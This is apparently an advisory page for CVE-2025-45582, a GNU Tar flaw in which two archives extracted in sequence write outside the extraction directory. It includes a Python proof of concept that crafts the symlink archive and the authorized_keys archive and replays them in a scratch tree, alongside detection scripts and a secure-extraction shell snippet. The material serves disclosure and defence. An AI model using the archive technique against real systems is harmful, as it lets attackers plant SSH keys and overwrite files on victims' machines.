CVE-2025-45582 Overview
CVE-2025-45582 is a directory traversal vulnerability in GNU Tar through version 1.35 that allows an attacker to create or overwrite files outside the extraction directory using crafted TAR archives. The attack uses two archives extracted in sequence into the same directory: the first plants a symlink, the second writes through it. Tar's check for '..' in member names is applied to each archive on its own, so neither archive is rejected.
Critical Impact
Successful exploitation lets an attacker write attacker-controlled content to files outside the extraction directory, such as a user's .ssh/authorized_keys, configuration files, or other sensitive files, by writing through a symlink planted during an earlier extraction.
Affected Products
- GNU Tar through version 1.35
- Server applications that automatically extract user-supplied TAR archives
- Software installation processes using multiple tar xf operations in the same directory
Discovery Timeline
- 2025-07-11 - CVE-2025-45582 published to NVD
- 2025-11-02 - Last updated in NVD database
Technical Details for CVE-2025-45582
Vulnerability Analysis
GNU Tar refuses to extract members whose name contains a '..' component, reporting "Member name contains '..'", so a single archive cannot name a path outside the extraction directory. That check only looks at the members of the archive currently being extracted; it does not consider what an earlier extraction left behind in the destination directory.
The vulnerability requires the victim to extract two specially crafted archives in sequence into the same directory. The first archive contains a symlink pointing to a sensitive directory outside the extraction path (e.g., x -> ../../../../../home/victim/.ssh). The second archive contains a regular file whose path starts with the symlink name (e.g., x/authorized_keys). Neither member name contains '..', so both archives pass tar's check.
When the second archive is extracted, the operating system resolves x through the symlink left by the first archive, and tar writes the file into the target directory. This is most dangerous in automated environments that unpack several archives into one directory, such as package installers processing dependency tarballs or CI/CD pipelines handling user-supplied tarballs.
Root Cause
The root cause is that GNU Tar's traversal check examines each archive's member names in isolation. It does not account for the cumulative effect of extracting several archives into the same directory, where a symlink left by an earlier extraction turns a clean-looking relative path into a write outside the intended tree. The weakness is classified as CWE-24 (Path Traversal: '../filedir').
Attack Vector
The attack requires local access and user interaction, following this two-step exploitation process:
First Archive Extraction: The attacker crafts a TAR archive containing a symlink that points to a sensitive directory using relative path traversal. For example, a symlink named x pointing to ../../../../../home/victim/.ssh.
Second Archive Extraction: A second TAR archive contains a regular file whose path begins with the symlink name, for example x/authorized_keys, with the attacker's public key as its content.
When the victim extracts both archives into the same directory (common practice in automated systems), the second extraction writes through the symlink and replaces the target file, or creates it if it did not exist. In the example above, the victim's authorized_keys is replaced with the attacker's key, allowing the attacker to log in over SSH.
This attack is especially effective against:
- Server applications that automatically extract user-supplied archives
- Package installation processes that extract multiple dependency tarballs
- Build systems processing untrusted archive inputs
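The two-stage sequence above, as an added example (this is not GNU Tar code and not from the advisory): the archives are built with Python's tarfile module, replayed through a deliberately naive extractor that only rejects '..' in member names and otherwise lets the OS follow whatever symlink already sits in a parent component (the behaviour the advisory attributes to GNU Tar), and then checked with a pre-extraction test that resolves each member against the destination's real on-disk state. All names (build_two_archives, naive_extract, escaping_members, demo, the x symlink, the victim paths and key strings) are this example's own, and the key material is a constructed placeholder.

```python
"""Added example, not GNU Tar code: crafts the two archives, replays the
naive extraction that follows a pre-existing symlink, and shows a
pre-extraction check that resolves members against the on-disk state."""
from __future__ import annotations

import io
import os
import tarfile
import tempfile


def build_two_archives(workdir: str, link_target: str) -> tuple[str, str]:
    """Write stage1.tar (symlink x -> link_target) and stage2.tar (x/authorized_keys).
    Constructed sample data; neither member *name* contains '..'."""
    stage1 = os.path.join(workdir, "stage1.tar")
    stage2 = os.path.join(workdir, "stage2.tar")
    with tarfile.open(stage1, "w") as tf:
        link = tarfile.TarInfo("x")
        link.type = tarfile.SYMTYPE
        link.linkname = link_target          # the '..' lives in the link target, not the name
        tf.addfile(link)
    with tarfile.open(stage2, "w") as tf:
        payload = b"ssh-ed25519 AAAA-attacker-key\n"  # constructed placeholder key
        info = tarfile.TarInfo("x/authorized_keys")
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))
    return stage1, stage2


def naive_extract(archive: str, dest: str) -> None:
    """Extractor that mirrors only the per-archive name check the advisory describes."""
    with tarfile.open(archive) as tf:
        for m in tf.getmembers():
            if os.path.isabs(m.name) or ".." in m.name.split("/"):
                raise ValueError(f"Member name contains '..': {m.name}")
            path = os.path.join(dest, m.name)
            if m.issym():
                os.symlink(m.linkname, path)
            elif m.isfile():
                # If dest/x is already a symlink, makedirs() and open() follow it.
                os.makedirs(os.path.dirname(path), exist_ok=True)
                with open(path, "wb") as f:
                    f.write(tf.extractfile(m).read())


def escaping_members(archive: str, dest: str) -> list[str]:
    """Names of members whose final on-disk location (or, for symlinks, whose
    target) resolves outside dest, taking symlinks already present in dest
    into account.  Run this immediately before each extraction."""
    root = os.path.realpath(dest)
    flagged = []
    with tarfile.open(archive) as tf:
        for m in tf.getmembers():
            on_disk = os.path.join(dest, m.name)
            if m.issym():
                on_disk = os.path.join(os.path.dirname(on_disk), m.linkname)
            resolved = os.path.realpath(on_disk)
            if os.path.commonpath([root, resolved]) != root:
                flagged.append(m.name)
    return flagged


def demo() -> dict:
    """Run the two-stage sequence in a scratch tree and report what happened."""
    base = tempfile.mkdtemp()
    victim_ssh = os.path.join(base, "home", "victim", ".ssh")
    os.makedirs(victim_ssh)
    auth_keys = os.path.join(victim_ssh, "authorized_keys")
    with open(auth_keys, "w") as f:
        f.write("ssh-ed25519 AAAA-legitimate-key\n")       # constructed original content
    upload_dir = os.path.join(base, "srv", "uploads")      # where untrusted archives are unpacked
    os.makedirs(upload_dir)
    # Relative to upload_dir, '../../home/victim/.ssh' is the victim's .ssh directory.
    stage1, stage2 = build_two_archives(base, "../../home/victim/.ssh")

    stage2_before = escaping_members(stage2, upload_dir)   # no symlink on disk yet: clean
    naive_extract(stage1, upload_dir)                      # plants upload_dir/x -> ../../home/victim/.ssh
    stage2_after = escaping_members(stage2, upload_dir)    # now x/authorized_keys resolves outside
    naive_extract(stage2, upload_dir)                      # the naive extractor writes through the link
    with open(auth_keys) as f:
        overwritten = "attacker-key" in f.read()
    fresh_dir = tempfile.mkdtemp(dir=base)                 # mitigation: an empty directory per archive
    return {
        "stage1_flagged": escaping_members(stage1, upload_dir),
        "stage2_before": stage2_before,
        "stage2_after": stage2_after,
        "authorized_keys_overwritten": overwritten,
        "stage2_in_fresh_dir": escaping_members(stage2, fresh_dir),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of escaping_members is that it checks against the destination as it actually is, not against the archive alone: stage2 is clean before stage1 has run and flagged afterwards, and it is clean again in a fresh directory, which is why an empty destination per extraction is the effective mitigation.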
Detection Methods for CVE-2025-45582
Indicators of Compromise
- Unexpected symlinks in extraction directories pointing outside the intended path
- Modified sensitive files (e.g., .ssh/authorized_keys, configuration files) with timestamps correlating to TAR extraction operations
- Extraction logs showing more than one untrusted archive unpacked into the same directory
Detection Strategies
- Monitor file system activity during TAR extraction for symlinks whose target resolves outside the extraction directory
- Audit extraction directories for symlinks with ../ components or absolute paths in their targets, including dangling links whose target does not exist yet
- Run file integrity monitoring on the files an attacker would target (SSH keys, configuration files, startup scripts) and correlate any change with extraction activity
Monitoring Recommendations
- Enable detailed logging for TAR extraction operations in automated systems
- Alert in real time on symlinks created under extraction directories whose target resolves outside them
- Monitor for unauthorized modifications to authentication credential files
- Review package installation and build logs for multiple untrusted archives unpacked into the same directory
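The audit items above, as an added example (not a GNU Tar tool and not from the advisory): walk an extraction directory without following links and report every symlink that resolves outside it, which is the foothold stage one of this attack leaves behind. Dangling links are reported as well, since a link whose target does not exist yet becomes usable as soon as the target appears. The function names (audit_extraction_dir, build_sample_tree) and the sample tree are this example's own.

```python
"""Added example, not GNU Tar code: post-extraction sweep for symlinks that
escape an extraction directory or dangle."""
import os
import tempfile


def audit_extraction_dir(root: str) -> list[dict]:
    """One record per symlink under root that escapes root or dangles."""
    root_real = os.path.realpath(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        # os.walk lists symlinks to directories in dirnames but does not descend into them
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            resolved = os.path.realpath(path)
            escapes = os.path.commonpath([root_real, resolved]) != root_real
            dangling = not os.path.exists(path)   # exists() follows the link
            if escapes or dangling:
                findings.append({
                    "link": os.path.relpath(path, root),
                    "target": os.readlink(path),
                    "resolved": resolved,
                    "escapes": escapes,
                    "dangling": dangling,
                })
    return findings


def build_sample_tree() -> str:
    """Constructed sample extraction directory: one benign in-tree link,
    one link into a user's .ssh directory, and one dangling link."""
    base = tempfile.mkdtemp()
    ext = os.path.join(base, "uploads")
    os.makedirs(os.path.join(ext, "pkg", "lib"))
    os.makedirs(os.path.join(base, "home", "victim", ".ssh"))
    os.symlink("lib", os.path.join(ext, "pkg", "lib64"))                 # benign, stays inside
    os.symlink("../../home/victim/.ssh", os.path.join(ext, "pkg", "x"))  # escapes: the CVE foothold
    os.symlink("../home/nobody/.ssh", os.path.join(ext, "y"))            # dangling now, escapes later
    return ext


if __name__ == "__main__":
    for finding in audit_extraction_dir(build_sample_tree()):
        print(finding)
```

Run it against directories that receive untrusted archives as part of the integrity monitoring the section recommends; any finding is a signal that a later extraction into that directory can be redirected.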
How to Mitigate CVE-2025-45582
Immediate Actions Required
- Audit systems that extract untrusted archives automatically and isolate the extraction step (dedicated user, sandbox, or container)
- Extract every untrusted archive into a fresh, empty directory; this is the mitigation the GNU Tar security guidelines give, and it removes the foothold the first archive relies on
- Use --one-top-level to wrap an archive's contents in a subdirectory named after the archive; this only helps if that subdirectory does not already exist
- --keep-old-files makes tar refuse to replace an existing file, so an existing authorized_keys would be preserved, but it does not stop tar from creating a new file through a planted symlink; --no-overwrite-dir only preserves the metadata of existing directories and offers no protection against this attack
Patch Information
No official patch has been released at the time of publication. System administrators should consult the GNU Tar Bug Report and OpenWall OSS Security Discussion for the latest updates on remediation guidance. The GNU Tar Security Guidelines provide best practices for secure archive extraction.
Workarounds
- Create a fresh, empty directory for each tar xf operation, as the GNU Tar manual recommends
- Use --one-top-level so each archive lands in its own subdirectory, and check that the subdirectory does not already exist
- List the archive with tar -tvf before extraction and refuse it if it contains symlinks or '..' components; a listing check cannot see symlinks already present in the destination, so pair it with an empty destination
- Run processes that extract untrusted archives under sandboxing or containerization with no access to the files an attacker would target
# Secure extraction example: one fresh, unpredictable, empty directory per archive
dest="$(mktemp -d)"
# Inspect the listing first; refuse archives that carry symlinks or '..' components
if tar -tvf untrusted_archive.tar | grep -E ' -> |(^|/)\.\.(/|$)'; then
    echo "refusing archive with symlinks or '..' paths" >&2; exit 1
fi
# Extract into the empty directory; --one-top-level wraps the members in a subdirectory named after the archive
tar -C "$dest" --one-top-level -xf untrusted_archive.tar
# Confirm no symlink resolves outside the destination before the contents are used
find "$dest" -type l -exec ls -l {} +
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

